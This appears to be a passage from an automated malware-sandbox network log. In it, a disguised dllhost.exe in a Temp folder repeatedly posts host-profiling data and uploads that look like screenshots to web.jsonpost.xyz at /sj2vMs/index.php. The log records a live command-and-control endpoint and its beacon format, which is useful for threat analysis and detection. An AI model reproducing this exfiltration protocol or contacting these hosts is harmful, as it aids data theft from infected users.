                                                                                Nov 29, 2024 01:52:27.529521942 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49769 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:28.908432961 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49770 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:29.120588064 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:29.120625019 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49771 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:30.279799938 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49772 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:30.622848988 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:30.623014927 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49773 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:31.640953064 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49774 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:32.193599939 CET | 196 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----2da2ec123a554cc4f0e9e4f45f265c8c
Host: web.jsonpost.xyz
Content-Length: 102787
Cache-Control: no-cache
Nov 29, 2024 01:52:32.193667889 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 32 64 61 32 65 63 31 32 33 61 35 35 34 63 63 34 66 30 65 39 65 34 66 34 35 66 32 36 35 63 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------2da2ec123a554cc4f0e9e4f45f265c8cContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49775 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:33.064846039 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: web.jsonpost.xyz
Content-Length: 82
Cache-Control: no-cache
Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49776 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:33.238214016 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
Host: web.jsonpost.xyz
Content-Length: 98005
Cache-Control: no-cache
Nov 29, 2024 01:52:33.238248110 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49777 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:34.530024052 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49778 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:34.745754004 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:52:34.745831966 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49779 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:35.951947927 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49780 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:36.334525108 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----75fc820eeb92975bff3e841961ce7c5b
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98287
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:52:36.334578991 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 37 35 66 63 38 32 30 65 65 62 39 32 39 37 35 62 66 66 33 65 38 34 31 39 36 31 63 65 37 63 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------75fc820eeb92975bff3e841961ce7c5bContent-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49781 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:37.376539946 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49782 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:37.883363008 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:52:37.883363008 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49783 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:38.796008110 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49784 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:39.390439034 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
Nov 29, 2024 01:52:39.390506983 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:52:39.630887985 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.4 | 49785 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:40.188575983 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.4 | 49786 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:40.250339985 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:40.250339985 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 49787 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:41.671772003 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49788 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:41.782862902 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:41.783000946 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49789 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:43.052773952 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49790 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:43.254591942 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:43.254626036 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49791 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:44.515260935 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49792 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
Timestamp | Bytes transferred | Direction | Data
Nov 29, 2024 01:52:44.669003963 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:44.669038057 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                57 | 192.168.2.4 | 49793 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:45.889520884 CET | 235 | OUT | POST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                58 | 192.168.2.4 | 49794 | 72.52.178.23 | 80 | 7608 | C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Nov 29, 2024 01:52:46.088804007 CET | 195 | OUT | POST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:46.088917017 CET | 156 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
